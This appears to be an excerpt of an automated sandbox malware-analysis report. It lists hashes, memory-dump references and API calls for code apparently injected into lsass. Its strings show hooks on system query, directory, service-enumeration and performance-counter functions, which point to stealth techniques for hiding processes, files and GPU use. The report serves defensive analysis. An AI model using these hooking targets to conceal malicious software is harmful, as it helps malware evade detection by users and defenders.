                                                  • Opcode Fuzzy Hash: e59c82fe0f2ec094d57bed0c98c400f651c9509d4f271adb2dc6c0c8ab65cd82
                                                  • Instruction Fuzzy Hash: 98F01D22304781D2F7308B51E8CC76D6360E748B98F854123DB8946556DA3DC69CC700

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocAllocate
                                                  • String ID:
                                                  • API String ID: 1154092256-0
                                                  • Opcode ID: 1f44e6271c1b5e39a937113a1e618e8eb6fe08943c73d2d47ba7f0255cfb855b
                                                  • Instruction ID: 5bed3e4cd879ff787faebb98e90f2d9d72ba6f7ae811490ced22ca73b8c24a2d
                                                  • Opcode Fuzzy Hash: 1f44e6271c1b5e39a937113a1e618e8eb6fe08943c73d2d47ba7f0255cfb855b
                                                  • Instruction Fuzzy Hash: 7BE03932601700C6F7088BA2D84C34D37E1EB88B05F0681268A0907361DF7E859D8740

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32 ref: 00000202C0AE3605
                                                  • PathFindFileNameW.SHLWAPI ref: 00000202C0AE3614
                                                    • Part of subcall function 00000202C0AE3C40: StrCmpNIW.SHLWAPI(?,?,?,00000202C0AE2513), ref: 00000202C0AE3C58
                                                    • Part of subcall function 00000202C0AE3B8C: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000202C0AE362B), ref: 00000202C0AE3B9A
                                                    • Part of subcall function 00000202C0AE3B8C: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000202C0AE362B), ref: 00000202C0AE3BC8
                                                    • Part of subcall function 00000202C0AE3B8C: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000202C0AE362B), ref: 00000202C0AE3BEA
                                                    • Part of subcall function 00000202C0AE3B8C: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000202C0AE362B), ref: 00000202C0AE3C05
                                                    • Part of subcall function 00000202C0AE3B8C: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000202C0AE362B), ref: 00000202C0AE3C26
                                                  • CreateThread.KERNELBASE ref: 00000202C0AE365B
                                                    • Part of subcall function 00000202C0AE1D48: GetCurrentThread.KERNEL32 ref: 00000202C0AE1D53
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                  • String ID:
                                                  • API String ID: 1683269324-0
                                                  • Opcode ID: cfb75781ef125e8798c35dece2b590244b14960149cb17afe32fff2217cf4a51
                                                  • Instruction ID: 1a16cc91a592eaf1bb8f81eb6cdced4c02f428e999813c360610cc35bfffc824
                                                  • Opcode Fuzzy Hash: cfb75781ef125e8798c35dece2b590244b14960149cb17afe32fff2217cf4a51
                                                  • Instruction Fuzzy Hash: 5811D472B18780E2F7609731A4CD77E2295BF94788F92012B97A6453D7EF7DC56C8600
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000003.1746372626.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_3_202c0ab0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 000990a0b745e2d7aebf751e9a901d84576f17a5eee71522b46ce82416c04370
                                                  • Instruction ID: 93ca0017784342b5f8d47f8b6a2b98fb6e0b89eca1f482e8667fc627991d8ca0
                                                  • Opcode Fuzzy Hash: 000990a0b745e2d7aebf751e9a901d84576f17a5eee71522b46ce82416c04370
                                                  • Instruction Fuzzy Hash: 3B912372B01390C7FB648F25D48CB6DB791FB54B98F5681279F4A07B8ADA38D81AC710

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00000202C0AE1630: GetProcessHeap.KERNEL32 ref: 00000202C0AE163B
                                                    • Part of subcall function 00000202C0AE1630: HeapAlloc.KERNEL32 ref: 00000202C0AE164A
                                                    • Part of subcall function 00000202C0AE1630: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE16BA
                                                    • Part of subcall function 00000202C0AE1630: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE16E7
                                                    • Part of subcall function 00000202C0AE1630: RegCloseKey.ADVAPI32 ref: 00000202C0AE1701
                                                    • Part of subcall function 00000202C0AE1630: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1721
                                                    • Part of subcall function 00000202C0AE1630: RegCloseKey.KERNELBASE ref: 00000202C0AE173C
                                                    • Part of subcall function 00000202C0AE1630: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE175C
                                                    • Part of subcall function 00000202C0AE1630: RegCloseKey.ADVAPI32 ref: 00000202C0AE1777
                                                    • Part of subcall function 00000202C0AE1630: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1797
                                                    • Part of subcall function 00000202C0AE1630: RegCloseKey.ADVAPI32 ref: 00000202C0AE17B2
                                                    • Part of subcall function 00000202C0AE1630: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE17D2
                                                  • SleepEx.KERNEL32 ref: 00000202C0AE1AEB
                                                    • Part of subcall function 00000202C0AE1630: RegCloseKey.ADVAPI32 ref: 00000202C0AE17ED
                                                    • Part of subcall function 00000202C0AE1630: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE180D
                                                    • Part of subcall function 00000202C0AE1630: RegCloseKey.ADVAPI32 ref: 00000202C0AE1828
                                                    • Part of subcall function 00000202C0AE1630: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1848
                                                    • Part of subcall function 00000202C0AE1630: RegCloseKey.ADVAPI32 ref: 00000202C0AE1863
                                                    • Part of subcall function 00000202C0AE1630: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1883
                                                    • Part of subcall function 00000202C0AE1630: RegCloseKey.ADVAPI32 ref: 00000202C0AE189E
                                                    • Part of subcall function 00000202C0AE1630: RegCloseKey.ADVAPI32 ref: 00000202C0AE18A8
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                  • String ID:
                                                  • API String ID: 948135145-0
                                                  • Opcode ID: 64fb92cc953f313ae368503f7b994b04d0db7b05d41c96cf66c0a3f5624dce5c
                                                  • Instruction ID: 35a3164047d053dc7dc55157da15137a4be388c5bb45f4dd6214601136a8ae4e
                                                  • Opcode Fuzzy Hash: 64fb92cc953f313ae368503f7b994b04d0db7b05d41c96cf66c0a3f5624dce5c
                                                  • Instruction Fuzzy Hash: 0B310E716107A1D2FB509B26D9CC36D23A4AB84FC4F4640239FA987BD7FE24C8B88350

                                                  Control-flow Graph

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(?,?,00000000,00000202C0AED952,?,?,?,00000202C0AEE005,?,?,?,?,00000202C0AEE0C8), ref: 00000202C0AEE071
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 6caf3ecdcaea9ac1bdfecdc92915c167d5b0268ab0ef6e8421fe897a70aa0972
                                                  • Instruction ID: c9d4a37fed57615ab89e1e61388bf7645ba609087ba41a0b9f0c87b147f2e4db
                                                  • Opcode Fuzzy Hash: 6caf3ecdcaea9ac1bdfecdc92915c167d5b0268ab0ef6e8421fe897a70aa0972
                                                  • Instruction Fuzzy Hash: 00F0B454342380C2FE68E7E559DC3AD12845B48B80F0E41374F5A867D3EE9DC5AD4210

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 339 202c0ae2bc8-202c0ae2c41 341 202c0ae2f5c-202c0ae2f7f 339->341 342 202c0ae2c47-202c0ae2c4d 339->342 342->341 343 202c0ae2c53-202c0ae2c56 342->343 343->341 344 202c0ae2c5c-202c0ae2c5f 343->344 344->341 345 202c0ae2c65-202c0ae2c75 GetModuleHandleA 344->345 346 202c0ae2c89 345->346 347 202c0ae2c77-202c0ae2c87 GetProcAddress 345->347 348 202c0ae2c8c-202c0ae2caa 346->348 347->348 348->341 350 202c0ae2cb0-202c0ae2ccf StrCmpNIW 348->350 350->341 351 202c0ae2cd5-202c0ae2cd9 350->351 351->341 352 202c0ae2cdf-202c0ae2ce9 351->352 352->341 353 202c0ae2cef-202c0ae2cf6 352->353 353->341 354 202c0ae2cfc-202c0ae2d0f 353->354 355 202c0ae2d11-202c0ae2d1d 354->355 356 202c0ae2d1f 354->356 357 202c0ae2d22-202c0ae2d26 355->357 356->357 358 202c0ae2d28-202c0ae2d34 357->358 359 202c0ae2d36 357->359 360 202c0ae2d39-202c0ae2d43 358->360 359->360 361 202c0ae2e29-202c0ae2e2d 360->361 362 202c0ae2d49-202c0ae2d4c 360->362 363 202c0ae2f4e-202c0ae2f56 361->363 364 202c0ae2e33-202c0ae2e36 361->364 365 202c0ae2d5e-202c0ae2d68 362->365 366 202c0ae2d4e-202c0ae2d5b call 202c0ae193c 362->366 363->341 363->354 367 202c0ae2e38-202c0ae2e44 call 202c0ae193c 364->367 368 202c0ae2e47-202c0ae2e51 364->368 370 202c0ae2d9c-202c0ae2da6 365->370 371 202c0ae2d6a-202c0ae2d77 365->371 366->365 367->368 375 202c0ae2e81-202c0ae2e84 368->375 376 202c0ae2e53-202c0ae2e60 368->376 372 202c0ae2da8-202c0ae2db5 370->372 373 202c0ae2dd6-202c0ae2dd9 370->373 371->370 378 202c0ae2d79-202c0ae2d86 371->378 372->373 380 202c0ae2db7-202c0ae2dc4 372->380 382 202c0ae2ddb-202c0ae2de5 call 202c0ae1bd0 373->382 383 202c0ae2de7-202c0ae2df4 lstrlenW 373->383 385 202c0ae2e91-202c0ae2e9e lstrlenW 375->385 386 202c0ae2e86-202c0ae2e8f call 202c0ae1bd0 375->386 376->375 384 202c0ae2e62-202c0ae2e6f 376->384 379 202c0ae2d89-202c0ae2d8f 378->379 387 202c0ae2e1f-202c0ae2e24 379->387 388 202c0ae2d95-202c0ae2d9a 379->388 391 202c0ae2dc7-202c0ae2dcd 380->391 382->383 382->387 394 202c0ae2df6-202c0ae2e05 call 202c0ae1c08 383->394 395 202c0ae2e07-202c0ae2e19 call 202c0ae3c40 383->395 393 202c0ae2e72-202c0ae2e78 384->393 389 202c0ae2ea0-202c0ae2eaf call 202c0ae1c08 385->389 390 202c0ae2eb1-202c0ae2ebb call 202c0ae3c40 385->390 386->385 405 202c0ae2ec6-202c0ae2ed1 386->405 399 202c0ae2ebe-202c0ae2ec0 387->399 388->370 388->379 389->390 389->405 390->399 391->387 402 202c0ae2dcf-202c0ae2dd4 391->402 404 202c0ae2e7a-202c0ae2e7f 393->404 393->405 394->387 394->395 395->387 395->399 399->363 399->405 402->373 402->391 404->375 404->393 410 202c0ae2f48-202c0ae2f4c 405->410 411 202c0ae2ed3-202c0ae2ed7 405->411 410->363 413 202c0ae2edf-202c0ae2ef9 call 202c0af5470 411->413 414 202c0ae2ed9-202c0ae2edd 411->414 415 202c0ae2efc-202c0ae2eff 413->415 414->413 414->415 417 202c0ae2f01-202c0ae2f1f call 202c0af5470 415->417 418 202c0ae2f22-202c0ae2f25 415->418 417->418 418->410 421 202c0ae2f27-202c0ae2f45 call 202c0af5470 418->421 421->410
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 5fbd9173ce4d782f6a43f1b6ae1fcce4f28eac928785eaf1fb737f6660f8b0ea
                                                  • Instruction ID: 4314a8b1ed6b204532a0f31e93eab12a67f286aeab53204cc6a27d22193b219a
                                                  • Opcode Fuzzy Hash: 5fbd9173ce4d782f6a43f1b6ae1fcce4f28eac928785eaf1fb737f6660f8b0ea
                                                  • Instruction Fuzzy Hash: 6CB1AC322107A0C2FB689F25D48C7AD67A4FB44B84F565027EFA953796EB35CCA8C340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 9234f04ebf3d0d18ada26ad48c251ddc084bcc865350783e627834a553364bb5
                                                  • Instruction ID: 66e7c023d4387bbc1e636bba292115cb606691f73e828036ac9d8c66fe5483f6
                                                  • Opcode Fuzzy Hash: 9234f04ebf3d0d18ada26ad48c251ddc084bcc865350783e627834a553364bb5
                                                  • Instruction Fuzzy Hash: B0310872204B80CAFB648F60E8987EE6364F784744F45452BDB8E47B96EF39C658C710
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 25459dfd405c3fd6abe62832c5e49632febe87f8ccdadd93aea5d47d5ebeda6d
                                                  • Instruction ID: 83faedb851172bfc9757186625cf35b1b3d2642a0b400db8f1669639708ed79f
                                                  • Opcode Fuzzy Hash: 25459dfd405c3fd6abe62832c5e49632febe87f8ccdadd93aea5d47d5ebeda6d
                                                  • Instruction Fuzzy Hash: 08315E32214B80C6EB64CF65E88879E73A4F789754F510217EB9D47B96DF38C65ACB00

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentThread.KERNEL32 ref: 00000202C0AE1D53
                                                    • Part of subcall function 00000202C0AE208C: GetModuleHandleA.KERNEL32(?,?,?,00000202C0AE1D85), ref: 00000202C0AE20A4
                                                    • Part of subcall function 00000202C0AE208C: GetProcAddress.KERNEL32(?,?,?,00000202C0AE1D85), ref: 00000202C0AE20B5
                                                    • Part of subcall function 00000202C0AE5F20: GetCurrentThreadId.KERNEL32 ref: 00000202C0AE5F5B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread$AddressHandleModuleProc
                                                  • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 4175298099-1819131285
                                                  • Opcode ID: ec902621774e6c93ddf96b1cef49485a110a34d9b18634e59d3ce01917ac58d9
                                                  • Instruction ID: 33386cd37652bd03fd50b10d7ea5a5c52fed18bd381e4fd3463abda814898b8d
                                                  • Opcode Fuzzy Hash: ec902621774e6c93ddf96b1cef49485a110a34d9b18634e59d3ce01917ac58d9
                                                  • Instruction Fuzzy Hash: 384198A1100B8BE0FA08DF64E8DD7DC2325BB40788F835423A759035B3DE798A5EC390

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: e2ed30d8db31d81b4c0daa00d2e475a39dc02a101f7e26d9b862c19419363001
                                                  • Instruction ID: 97de7faff78fd11177c95f5b5fec2739a7af5d64d191cafaccb8fc22e298fc31
                                                  • Opcode Fuzzy Hash: e2ed30d8db31d81b4c0daa00d2e475a39dc02a101f7e26d9b862c19419363001
                                                  • Instruction Fuzzy Hash: A7511872604B84C6EB54CFA2E88C39EB7A1F788F98F454126DB8907769DF39C15D8700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000003.1746372626.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_3_202c0ab0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID: `eh vector constructor iterator'$`virtual displacement map'$or iterator'$r iterator'
                                                  • API String ID: 190073905-2094522767
                                                  • Opcode ID: 12e6944f9e020bf7bba539df7bc83e8ef27753177fa0d3ccda2e8152a8c18693
                                                  • Instruction ID: 2da35312e72075452c333d1995a101228596f7b45e8fe5402a874d2598731ccf
                                                  • Opcode Fuzzy Hash: 12e6944f9e020bf7bba539df7bc83e8ef27753177fa0d3ccda2e8152a8c18693
                                                  • Instruction Fuzzy Hash: A981C031700701C6FA60AB65A8CD3AD27D8AB89B84F475527EB09477E7EB7DC94D8700

                                                  Control-flow Graph

                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,00000202C0AF13BB,?,?,?,00000202C0AF0DAC,?,?,?,00000202C0AED19F), ref: 00000202C0AED787
                                                  • FlsGetValue.KERNEL32(?,?,?,00000202C0AF13BB,?,?,?,00000202C0AF0DAC,?,?,?,00000202C0AED19F), ref: 00000202C0AED79C
                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AF13BB,?,?,?,00000202C0AF0DAC,?,?,?,00000202C0AED19F), ref: 00000202C0AED7BD
                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AF13BB,?,?,?,00000202C0AF0DAC,?,?,?,00000202C0AED19F), ref: 00000202C0AED7EA
                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AF13BB,?,?,?,00000202C0AF0DAC,?,?,?,00000202C0AED19F), ref: 00000202C0AED7FB
                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AF13BB,?,?,?,00000202C0AF0DAC,?,?,?,00000202C0AED19F), ref: 00000202C0AED80C
                                                  • SetLastError.KERNEL32(?,?,?,00000202C0AF13BB,?,?,?,00000202C0AF0DAC,?,?,?,00000202C0AED19F), ref: 00000202C0AED827
                                                  • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF13BB,?,?,?,00000202C0AF0DAC,?,?,?,00000202C0AED19F), ref: 00000202C0AED85D
                                                  • FlsSetValue.KERNEL32(?,?,00000001,00000202C0AEF61C,?,?,?,?,00000202C0AEC8EF,?,?,?,?,?,00000202C0AE7EA0), ref: 00000202C0AED87C
                                                    • Part of subcall function 00000202C0AEE01C: RtlAllocateHeap.NTDLL(?,?,00000000,00000202C0AED952,?,?,?,00000202C0AEE005,?,?,?,?,00000202C0AEE0C8), ref: 00000202C0AEE071
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF13BB,?,?,?,00000202C0AF0DAC,?,?,?,00000202C0AED19F), ref: 00000202C0AED8A4
                                                    • Part of subcall function 00000202C0AEE094: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000202C0AE63FA), ref: 00000202C0AEE0AA
                                                    • Part of subcall function 00000202C0AEE094: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000202C0AE63FA), ref: 00000202C0AEE0B4
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF13BB,?,?,?,00000202C0AF0DAC,?,?,?,00000202C0AED19F), ref: 00000202C0AED8B5
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF13BB,?,?,?,00000202C0AF0DAC,?,?,?,00000202C0AED19F), ref: 00000202C0AED8C6
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Value$ErrorLast$Heap$AllocateFree
                                                  • String ID:
                                                  • API String ID: 3174826731-0
                                                  • Opcode ID: 61107eddd0a8e6bd0c478185a7cd5dc7639332fade6589c761d9e8646912cfb4
                                                  • Instruction ID: a936f47581fc29ec6437be5484234eb1f277812e10001eb98bc53de74764af28
                                                  • Opcode Fuzzy Hash: 61107eddd0a8e6bd0c478185a7cd5dc7639332fade6589c761d9e8646912cfb4
                                                  • Instruction Fuzzy Hash: BB4152202017C0C2FD58A73555DD76D2252AB897B4F164727EFBA4A7D3EE28DC6D8200

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 1886a53ecf893c2db2e77962806af446ee47527b1e7daf5f74d3f3510bc18bf0
                                                  • Instruction ID: d10029b34089a9a37cfab456ecc8833ee0340e0afa441fa74fef109fc2bb7633
